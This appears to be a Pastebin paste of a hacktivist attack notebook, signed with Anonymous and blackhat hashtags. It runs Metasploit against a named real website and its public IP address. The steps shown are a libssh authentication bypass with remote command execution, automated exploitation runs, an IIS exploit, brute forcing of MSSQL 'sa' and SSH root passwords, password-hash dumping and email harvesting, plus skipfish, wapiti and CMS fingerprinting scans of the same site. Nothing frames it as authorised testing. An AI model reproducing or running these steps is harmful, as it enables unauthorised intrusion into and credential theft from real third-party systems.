  3676. root@blackbox:~# systemctl status postgresql.service
  3677.  
  3678. USE METASPLOIT
  3679.  
  3680.  
  3681. root@blackbox:~# cd /opt/metasploit-framework/
  3682.  
  3683. root@blackbox:/opt/metasploit-framework# su postgres
  3684. postgres@blackbox:/opt/metasploit-framework$ createuser msf_user -P
  3685. Enter password for new role: msf
  3686. Enter it again: msf
  3687. postgres@blackbox:/opt/metasploit-framework$ createdb --owner=msf_user msf_database
  3688. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3689.  
  3690. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3691.  
  3692. IIIIII dTb.dTb _.---._
  3693. II 4' v 'B .'"".'/|\`.""'.
  3694. II 6. .P : .' / | \ `. :
  3695. II 'T;. .;P' '.' / | \ `.'
  3696. II 'T; ;P' `. / | \ .'
  3697. IIIIII 'YvP' `-.__|__.-'
  3698.  
  3699. I love shells --egypt
  3700.  
  3701.  
  3702. =[ metasploit v5.0.72-dev- ]
  3703. + -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
  3704. + -- --=[ 562 payloads - 45 encoders - 10 nops ]
  3705. + -- --=[ 7 evasion ]
  3706.  
  3707.  
  3708. msf5 > db_status
  3709. [*] Connected to msf. Connection type: postgresql.
  3710.  
  3711.  
  3712. root@blackbox:~# msfconsole
  3713.  
  3714. Attempting authentication bypass unpatched libssh
  3715.  
  3716. msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
  3717. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 184.154.192.250
  3718. rhosts => IPADDRESS
  3719. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 830
  3720. rport => 830
  3721. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
  3722. spawn_pty => true
  3723. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
  3724. verbose => true
  3725. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3726.  
  3727. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1
  3728. [*] Starting interaction with 1...
  3729.  
  3730. id
  3731.  
  3732. uname -a
  3733.  
  3734. tty
  3735.  
  3736.  
  3737. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
  3738. action => Execute
  3739. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
  3740. cmd => id; uname -a
  3741. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3742.  
  3743.  
  3744.  
  3745. USE WMAP
  3746.  
  3747. msf5 > load wmap
  3748.  
  3749. .-.-.-..-.-.-..---..---.
  3750. | | | || | | || | || |-'
  3751. `-----'`-'-'-'`-^-'`-'
  3752. [WMAP 1.5.1] === et [ ] metasploit.com 2012
  3753. [*] Successfully loaded plugin: wmap
  3754.  
  3755.  
  3756. Clean
  3757. msf5 > wmap_sites -l
  3758.  
  3759. msf5 > wmap_sites -d 0
  3760. msf5 > wmap_targets -c
  3761. msf5 > wmap_targets -l
  3762.  
  3763.  
  3764. ADD THE SITE
  3765.  
  3766. msf5 > wmap_sites -a http://www.etours.cn/
  3767. [*] Site created.
  3768. msf5 > wmap_sites -l
  3769. [*] Available sites
  3770. ===============
  3771.  
  3772. Id Host Vhost Port Proto # Pages # Forms
  3773. -- ---- ----- ---- ----- ------- -------
  3774. 0 184.154.192.250 184.154.192.250 80 http 0 0
  3775.  
  3776. ADD THE TARGET
  3777.  
  3778. msf5 > wmap_targets -t 184.154.192.250
  3779. msf5 > wmap_targets -l
  3780. [*] Defined targets
  3781. ===============
  3782.  
  3783. Id Vhost Host Port SSL Path
  3784. -- ----- ---- ---- --- ----
  3785. 0 184.154.192.250 184.154.192.250 80 false /
  3786.  
  3787.  
  3788.  
  3789. RUN THE TEST
  3790.  
  3791. msf5 > wmap_run -t
  3792. [*] Testing target:
  3793. [*] Site: 184.154.192.250 (184.154.192.250)
  3794. [*] Port: 80 SSL: false
  3795. ============================================================
  3796. [*] Testing started. 2020-01-29 05:09:16 -0600
  3797. [*] Loading wmap modules...
  3798. [*] 39 wmap enabled modules loaded.
  3799. [*]
  3800. =[ SSL testing ]=
  3801. ============================================================
  3802. [*] Target is not SSL. SSL modules disabled.
  3803. [*]
  3804. =[ Web Server testing ]=
  3805. ============================================================
  3806. [*] Module auxiliary/scanner/http/http_version
  3807. [*] Module auxiliary/scanner/http/open_proxy
  3808. [*] Module auxiliary/admin/http/tomcat_administration
  3809. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  3810. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  3811. [*] Module auxiliary/scanner/http/frontpage_login
  3812. [*] Module auxiliary/scanner/http/host_header_injection
  3813. [*] Module auxiliary/scanner/http/options
  3814. [*] Module auxiliary/scanner/http/robots_txt
  3815. [*] Module auxiliary/scanner/http/scraper
  3816. [*] Module auxiliary/scanner/http/svn_scanner
  3817. [*] Module auxiliary/scanner/http/trace
  3818. [*] Module auxiliary/scanner/http/vhost_scanner
  3819. [*] Module auxiliary/scanner/http/webdav_internal_ip
  3820. [*] Module auxiliary/scanner/http/webdav_scanner
  3821. [*] Module auxiliary/scanner/http/webdav_website_content
  3822. [*]
  3823. =[ File/Dir testing ]=
  3824. ============================================================
  3825. [*] Module auxiliary/scanner/http/backup_file
  3826. [*] Module auxiliary/scanner/http/brute_dirs
  3827. [*] Module auxiliary/scanner/http/copy_of_file
  3828. [*] Module auxiliary/scanner/http/dir_listing
  3829. [*] Module auxiliary/scanner/http/dir_scanner
  3830. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  3831. [*] Module auxiliary/scanner/http/file_same_name_dir
  3832. [*] Module auxiliary/scanner/http/files_dir
  3833. [*] Module auxiliary/scanner/http/http_put
  3834. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  3835. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  3836. [*] Module auxiliary/scanner/http/replace_ext
  3837. [*] Module auxiliary/scanner/http/soap_xml
  3838. [*] Module auxiliary/scanner/http/trace_axd
  3839. [*] Module auxiliary/scanner/http/verb_auth_bypass
  3840. [*]
  3841. =[ Unique Query testing ]=
  3842. ============================================================
  3843. [*] Module auxiliary/scanner/http/blind_sql_query
  3844. [*] Module auxiliary/scanner/http/error_sql_injection
  3845. [*] Module auxiliary/scanner/http/http_traversal
  3846. [*] Module auxiliary/scanner/http/rails_mass_assignment
  3847. [*] Module exploit/multi/http/lcms_php_exec
  3848. [*]
  3849. =[ Query testing ]=
  3850. ============================================================
  3851. [*]
  3852. =[ General testing ]=
  3853. ============================================================
  3854. [*] Done.
  3855.  
  3856.  
  3857.  
  3858. RUN THE EXPLOIT
  3859.  
  3860. msf5 > wmap_run -e
  3861.  
  3862.  
  3863.  
  3864. CHECK THE VULNERABILITIES
  3865.  
  3866. msf5 > wmap_vulns -l
  3867.  
  3868.  
  3869. EXECUTE VULNERABILITIES
  3870.  
  3871. msf > vulns
  3872.  
  3873.  
  3874. RUN DB_NMAP THROUGH METASPLOIT
  3875.  
  3876. msf5 > db_nmap 184.154.192.250 -Pn
  3877.  
  3878.  
  3879. msf5 > hosts
  3880.  
  3881.  
  3882. msf5 > hosts -c address,os_flavor
  3883.  
  3884.  
  3885. msf5 > hosts -c address,os_flavor -S Windows
  3886.  
  3887. msf5 > hosts -c address,os_flavor -S Windows -R
  3888.  
  3889. RHOSTS => 184.154.192.250
  3890.  
  3891. msf5 > services -h
  3892.  
  3893. msf5 > services -c name,info 184.154.192.250
  3894.  
  3895. msf5 > services -c name,info -S http
  3896.  
  3897.  
  3898. msf5 > services -c info,name -p 445
  3899.  
  3900. msf5 > services -c port,proto,state -p 70-81
  3901.  
  3902.  
  3903. msf5 > services -s http -c port 184.154.192.250
  3904.  
  3905. msf5 > search IIS
  3906.  
  3907. msf5 > use exploit/windows/iis/msadc
  3908.  
  3909. msf5 exploit(windows/iis/msadc) > run
  3910.  
  3911. msf5 > search mssql_login
  3912.  
  3913. Matching Modules
  3914. ================
  3915.  
  3916. # Name Disclosure Date Rank Check Description
  3917. - ---- --------------- ---- ----- -----------
  3918. 0 auxiliary/scanner/mssql/mssql_login normal No MSSQL Login Utility
  3919.  
  3920. msf5 > use auxiliary/scanner/mssql/mssql_login
  3921.  
  3922. msf5 auxiliary(scanner/mssql/mssql_login) > show options
  3923.  
  3924. msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
  3925. msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /opt/commix/src/txt/passwords_john.txt
  3926. msf5 auxiliary(scanner/mssql/mssql_login) > run
  3927.  
  3928.  
  3929. msf5 auxiliary(scanner/mssql/mssql_login) > creds
  3930. Credentials
  3931. ===========
  3932.  
  3933. host origin service public private realm private_type JtR Format
  3934. ---- ------ ------- ------ ------- ----- ------------ ----------
  3935.  
  3936. msf5 auxiliary(scanner/mssql/mssql_login) > back
  3937. msf5 > loot -h
  3938. Usage: loot [options]
  3939. Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  3940. Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
  3941. Del: loot -d [addr1 addr2 ...]
  3942.  
  3943. -a,--add Add loot to the list of addresses, instead of listing
  3944. -d,--delete Delete *all* loot matching host and type
  3945. -f,--file File with contents of the loot to add
  3946. -i,--info Info of the loot to add
  3947. -t <type1,type2> Search for a list of types
  3948. -h,--help Show this help information
  3949. -S,--search Search string to filter by
  3950.  
  3951.  
  3952.  
  3953. Here’s an example of how one would populate the database with some ‘loot’.
  3954.  
  3955. msf exploit(usermap_script) > exploit
  3956.  
  3957. msf exploit(usermap_script) > use post/linux/gather/hashdump
  3958.  
  3959. msf post(hashdump) > show options
  3960.  
  3961. msf post(hashdump) > sessions -l
  3962.  
  3963. msf post(hashdump) > run
  3964.  
  3965.  
  3966. USE LOOT
  3967.  
  3968. msf post(hashdump) > loot
  3969.  
  3970. RELOAD ALL METASPLOIT MODULES
  3971.  
  3972. msf > reload_all
  3973.  
  3974. USE ARP_SWEEP
  3975.  
  3976. msf > use auxiliary/scanner/discovery/arp_sweep
  3977.  
  3978. msf auxiliary(arp_sweep) > show options
  3979.  
  3980. msf auxiliary(arp_sweep) > set RHOSTS TARGET/24
  3981.  
  3982. RHOSTS => TARGET/24
  3983.  
  3984. msf auxiliary(arp_sweep) > set THREADS 50
  3985.  
  3986. THREADS => 50
  3987.  
  3988. msf auxiliary(arp_sweep) > run
  3989.  
  3990. USE NMAP
  3991.  
  3992. msf > nmap -sn TARGET/24
  3993.  
  3994. msf > nmap -PU -sn TARGET/24
  3995.  
  3996. msf > nmap -O TARGET
  3997.  
  3998. SEARCH PORTSCAN
  3999.  
  4000. msf > search portscan
  4001.  
  4002. USE PORTSCAN
  4003.  
  4004. msf > use auxiliary/scanner/portscan/syn
  4005.  
  4006. msf auxiliary(syn) > set RHOSTS TARGET
  4007.  
  4008. RHOSTS => TARGET
  4009.  
  4010. msf auxiliary(syn) > set THREADS 200
  4011.  
  4012. THREADS => 200
  4013.  
  4014. msf auxiliary(syn) > run
  4015.  
  4016. SEARCH NAME_VERSION
  4017.  
  4018. msf > search name:_version
  4019.  
  4020. USE TELNET AUXILIARY SCANNER
  4021.  
  4022. msf > use auxiliary/scanner/telnet/telnet_version
  4023.  
  4024. msf auxiliary(telnet_version) > set RHOSTS TARGET/24
  4025.  
  4026. RHOSTS => TARGET/24
  4027.  
  4028. msf auxiliary(telnet_version) > set THREADS 100
  4029.  
  4030. THREADS => 100
  4031.  
  4032. msf auxiliary(telnet_version) > run
  4033.  
  4034. USE AUXILIARY SSH_VERSION
  4035.  
  4036. msf > use auxiliary/scanner/ssh/ssh_version
  4037.  
  4038. msf auxiliary(ssh_version) > show options
  4039.  
  4040. Module options (auxiliary/scanner/ssh/ssh_version):
  4041.  
  4042. Name Current Setting Required Description
  4043.  
  4044. ---- --------------- -------- -----------
  4045.  
  4046. RHOSTS yes The target address range or CIDR identifier
  4047.  
  4048. RPORT 22 yes The target port
  4049.  
  4050. THREADS 1 yes The number of concurrent threads
  4051.  
  4052. TIMEOUT 30 yes Timeout for the SSH probe
  4053.  
  4054. msf auxiliary(ssh_version) > set RHOSTS TARGET/24
  4055.  
  4056. RHOSTS => TARGET/24
  4057.  
  4058. msf auxiliary(ssh_version) > set THREADS 200
  4059.  
  4060. THREADS => 200
  4061.  
  4062. msf auxiliary(ssh_version) > run
  4063.  
  4064. USE ORACLE SCANNER
  4065.  
  4066. msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
  4067.  
  4068. msf auxiliary(tnslsnr_version) > show options
  4069.  
  4070. Module options (auxiliary/scanner/oracle/tnslsnr_version):
  4071.  
  4072. Name Current Setting Required Description
  4073.  
  4074. ---- --------------- -------- -----------
  4075.  
  4076. RHOSTS yes The target address range or CIDR identifier
  4077.  
  4078. RPORT 1521 yes The target port
  4079.  
  4080. THREADS 1 yes The number of concurrent threads
  4081.  
  4082. msf auxiliary(tnslsnr_version) > set RHOSTS TARGET/24
  4083.  
  4084. RHOSTS => TARGET/24
  4085.  
  4086. msf auxiliary(tnslsnr_version) > set THREADS 200
  4087.  
  4088. THREADS => 200
  4089.  
  4090. msf auxiliary(tnslsnr_version) > run
  4091.  
  4092. USE OPEN_PROXY
  4093.  
  4094. msf auxiliary(open_proxy) > show options
  4095.  
  4096. Module options (auxiliary/scanner/http/open_proxy):
  4097.  
  4098. Name Current Setting Required Description
  4099.  
  4100. ---- --------------- -------- -----------
  4101.  
  4102. LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
  4103.  
  4104. MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
  4105.  
  4106. RANDOMIZE_PORTS false no Randomize the order the ports are probed
  4107.  
  4108. RHOSTS 24.25.24.1-xx.xx.xx.xx.xx yes The target address range or CIDR identifier
  4109.  
  4110. RPORT 8080 yes The target port
  4111.  
  4112. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
  4113.  
  4114. THREADS 200 yes The number of concurrent threads
  4115.  
  4116. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
  4117.  
  4118. VERIFY_CONNECT true no Enable test for CONNECT method
  4119.  
  4120. VERIFY_HEAD false no Enable test for HEAD method
  4121.  
  4122. ValidCode 200,302 no Valid HTTP code for a successfully request
  4123.  
  4124. ValidPattern server: gws
  4125.  
  4126. USE SSH_LOGIN
  4127.  
  4128. msf > use auxiliary/scanner/ssh/ssh_login
  4129.  
  4130. msf auxiliary(ssh_login) > set RHOSTS TARGET
  4131.  
  4132. RHOSTS => TARGET
  4133.  
  4134. msf auxiliary(ssh_login) > set USERNAME root
  4135.  
  4136. USERNAME => root
  4137.  
  4138. msf auxiliary(ssh_login) > set PASS_FILE /root/password.txt
  4139.  
  4140. PASS_FILE => /root/password.txt
  4141.  
  4142. msf auxiliary(ssh_login) > set THREADS 2000
  4143.  
  4144. THREADS => 2000
  4145.  
  4146. msf auxiliary(ssh_login) > run
  4147.  
  4148. USE AUXILIARY DIR_SCANNER
  4149.  
  4150. msf > use auxiliary/scanner/http/dir_scanner
  4151.  
  4152. msf auxiliary(dir_scanner) > set THREADS 50
  4153.  
  4154. THREADS => 50
  4155.  
  4156. msf auxiliary(dir_scanner) > set RHOSTS TARGET
  4157.  
  4158. RHOSTS => TARGET
  4159.  
  4160. msf auxiliary(dir_scanner) > exploit
  4161.  
  4162. USE EMAIL_COLLECTOR
  4163.  
  4164. msf > use auxiliary/gather/search_email_collector
  4165.  
  4166. msf auxiliary(search_email_collector) > set DOMAIN TARGET
  4167.  
  4168. DOMAIN => TARGET
  4169.  
  4170. msf auxiliary(search_email_collector) > run
  4171.  
  4172. USE AUXILIARY SCANNER HTTP CRAWLER
  4173.  
  4174. msf > use auxiliary/scanner/http/crawler
  4175.  
  4176. msf auxiliary(crawler) > set RHOST TARGET
  4177.  
  4178. RHOST => TARGET
  4179.  
  4180. msf auxiliary(crawler) > run
  4181.  
  4182. [*] Crawling http://TARGET:80/...
  4183.  
  4184. [*] Crawl of http://TARGET:80/ complete
  4185.  
  4186. [*] Auxiliary module execution completed
  4187.  
  4188.  
  4189. openvasad -c add_user -u admin -r Admin
  4190.  
  4191. openvasmd --user=admin --new-password=admin
  4192.  
  4193. openvas_target_create “windows” TARGET “new_scan”
  4194.  
  4195. msf > load openvas
  4196.  
  4197. [*] Welcome to OpenVAS integration by kost and averagesecurityguy.
  4198.  
  4199. [*]
  4200.  
  4201. [*] OpenVAS integration requires a database connection. Once the
  4202.  
  4203. [*] database is ready, connect to the OpenVAS server using openvas_connect.
  4204.  
  4205. [*] For additional commands use openvas_help.
  4206.  
  4207. [*]
  4208.  
  4209. [*] Successfully loaded plugin: OpenVAS
  4210.  
  4211. msf > openvas_connect admin admin localhost 9390 ok
  4212.  
  4213. msf > openvas_help
  4214.  
  4215. [*] openvas_help Display this help
  4216.  
  4217. [*] openvas_debug Enable/Disable debugging
  4218.  
  4219. [*] openvas_version Display the version of the OpenVAS server
  4220.  
  4221. [*]
  4222.  
  4223. [*] CONNECTION
  4224.  
  4225. [*] ==========
  4226.  
  4227. [*] openvas_connect Connects to OpenVAS
  4228.  
  4229. [*] openvas_disconnect Disconnects from OpenVAS
  4230.  
  4231. [*]
  4232.  
  4233. [*] TARGETS
  4234.  
  4235. [*] =======
  4236.  
  4237. [*] openvas_target_create Create target
  4238.  
  4239. [*] openvas_target_delete Deletes target specified by ID
  4240.  
  4241. [*] openvas_target_list Lists targets
  4242.  
  4243. [*]
  4244.  
  4245. [*] TASKS
  4246.  
  4247. [*] =====
  4248.  
  4249. [*] openvas_task_create Create task
  4250.  
  4251. [*] openvas_task_delete Delete a task and all associated reports
  4252.  
  4253. [*] openvas_task_list Lists tasks
  4254.  
  4255. [*] openvas_task_start Starts task specified by ID
  4256.  
  4257. [*] openvas_task_stop Stops task specified by ID
  4258.  
  4259. [*] openvas_task_pause Pauses task specified by ID
  4260.  
  4261. [*] openvas_task_resume Resumes task specified by ID
  4262.  
  4263. [*] openvas_task_resume_or_start Resumes or starts task specified by ID
  4264.  
  4265. [*]
  4266.  
  4267. [*] CONFIGS
  4268.  
  4269. [*] =======
  4270.  
  4271. [*] openvas_config_list Lists scan configurations
  4272.  
  4273. [*]
  4274.  
  4275. [*] FORMATS
  4276.  
  4277. [*] =======
  4278.  
  4279. [*] openvas_format_list Lists available report formats
  4280.  
  4281. [*]
  4282.  
  4283. [*] REPORTS
  4284.  
  4285. [*] =======
  4286.  
  4287. [*] openvas_report_list Lists available reports
  4288.  
  4289. [*] openvas_report_delete Delete a report specified by ID
  4290.  
  4291. [*] openvas_report_import Imports an OpenVAS report specified by ID
  4292.  
  4293. [*] openvas_report_download Downloads an OpenVAS report specified by ID
  4294.  
  4295. msf > openvas_config_list
  4296.  
  4297. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4298.  
  4299. [+] OpenVAS list of configs
  4300.  
  4301. ID Name
  4302.  
  4303. -- ----
  4304.  
  4305. 085569ce-73ed-11df-83c3-002264764cea empty
  4306.  
  4307. 2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery
  4308.  
  4309. 698f691e-7489-11df-9d8c-002264764cea Full and fast ultimate
  4310.  
  4311. 708f25c4-7489-11df-8094-002264764cea Full and very deep
  4312.  
  4313. 74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate
  4314.  
  4315. 8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery
  4316.  
  4317. bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery
  4318.  
  4319. daba56c8-73ec-11df-a475-002264764cea Full and fast
  4320.  
  4321. msf > openvas_target_list
  4322.  
  4323. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4324.  
  4325. [+] OpenVAS list of targets
  4326.  
  4327. ID Name Hosts Max Hosts In Use Comment
  4328.  
  4329. -- ---- ----- --------- ------ -------
  4330.  
  4331. 785ca141-93b1-4325-9117-040dbcd8297f “windows” TARGET 1 0 “new_scan”
  4332.  
  4333. b493b7a8-7489-11df-a3ec-002264764cea Localhost localhost 1 0
  4334.  
  4335.  
  4336. msf > openvas_task_create
  4337.  
  4338. [*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
  4339.  
  4340. msf > openvas_task_create "win" "test" 2d3f051c-55ba-11e3-bf43-406186ea4fc5 785ca141-93b1-4325-9117-040dbcd8297f
  4341.  
  4342. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4343.  
  4344. [*] f93de23e-ed04-4db9-9321-0e40d3c11d46
  4345.  
  4346. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4347.  
  4348. [+] OpenVAS list of tasks
  4349.  
  4350. ID Name Comment Status Progress
  4351.  
  4352. -- ---- ------- ------ --------
  4353.  
  4354. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test New -1
  4355.  
  4356. msf > openvas_task_start f93de23e-ed04-4db9-9321-0e40d3c11d46
  4357.  
  4358. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4359.  
  4360. [*] <X><authenticate_response status='200' status_text='OK'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity></authenticate_response><start_task_response status='202' status_text='OK, request submitted'><report_id>68e8a43f-8f06-4bc4-92a3-1fec76ea246b</report_id></start_task_response></X>
  4361.  
  4362.  
  4363. msf > openvas_task_list
  4364.  
  4365. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4366.  
  4367. [+] OpenVAS list of tasks
  4368.  
  4369. ID Name Comment Status Progress
  4370.  
  4371. -- ---- ------- ------ --------
  4372.  
  4373. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test Done -1
  4374.  
  4375. msf >
  4376.  
  4377. openvas_report_list
  4378.  
  4379. openvas_format_list
  4380.  
  4381. openvas_report_download 1 5 /root/Desktop report
  4382.  
  4383.  
  4384. CHECK THE SITE WITH SKIPFISH
  4385.  
  4386. root@blackbox:~# locate skipfish | grep bin
  4387. /usr/bin/skipfish
  4388. root@blackbox:~# locate dictionaries
  4389.  
  4390.  
  4391. root@blackbox:~# skipfish -S /usr/share/skipfish/dictionaries/complete.wl -o /tmp/scan http://etours.cn
  4392.  
  4393. EXAMPLES
  4394.  
  4395. Scan type: config
  4396.  
  4397. skipfish --config config/example.conf http://example.com
  4398.  
  4399. Scan type: quick
  4400.  
  4401. skipfish -o output/dir/ http://example.com
  4402.  
  4403. Scan type: extensive bruteforce
  4404.  
  4405. skipfish [...other options..] -S dictionaries/complete.wl
  4406.  
  4407. http://example.com
  4408.  
  4409. Scan type: without bruteforcing
  4410.  
  4411. skipfish [...other options..] -LY http://example.com
  4412.  
  4413. Scan type: authenticated (basic)
  4414.  
  4415. skipfish [...other options..] -A username:password http://example.com
  4416.  
  4417. Scan type: authenticated (cookie)
  4418.  
  4419. skipfish [...other options..] -C jsession=myauthcookiehere -X /logout
  4420.  
  4421. http://example.com
  4422.  
  4423. Scan type: flaky server
  4424.  
  4425. skipfish [...other options..] -l 5 -g 2 -t 30 -i 15 http://example.com
  4426.  
  4427. OPEN SKIPFISH RESULTS WITH FIREFOX
  4428.  
  4429. In terminal:
  4430.  
  4431. Report
  4432.  
  4433. ------
  4434.  
  4435. A report has been generated in the file /tmp/scan_report
  4436.  
  4437. Open /tmp/scan_report/index.html with a browser to see this report
  4438.  
  4439.  
  4440. CHECK THE SITE WITH WAPITI
  4441.  
  4442. root@blackbox:~# aptitude install wapiti
  4443.  
  4444. root@blackbox:~# wapiti --url http://etours.cn/ --scope folder -v 1 -f html -o /tmp/scan_report
  4445.  
  4446.  
  4447. USE BLINDELEPHANT
  4448.  
  4449. root@blackbox:~# cd /opt/
  4450. root@blackbox:/opt# git clone https://github.com/lokifer/BlindElephant.git
  4451. root@blackbox:/opt# cd BlindElephant/src/
  4452. root@blackbox:/opt/BlindElephant/src# python setup.py install
  4453.  
  4454. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn movabletype
  4455.  
  4456. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn guess
  4457.  
  4458. Probing...
  4459.  
  4460. ACUNETIX SCAN
  4461. https://pasteboard.co/ISeK7WC.jpg
  4462.  
  4463. https://pasteboard.co/ISeKyZk.jpg
  4464.  
  4465. #Anonymous #TheCreed #blackhat_global #GBN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!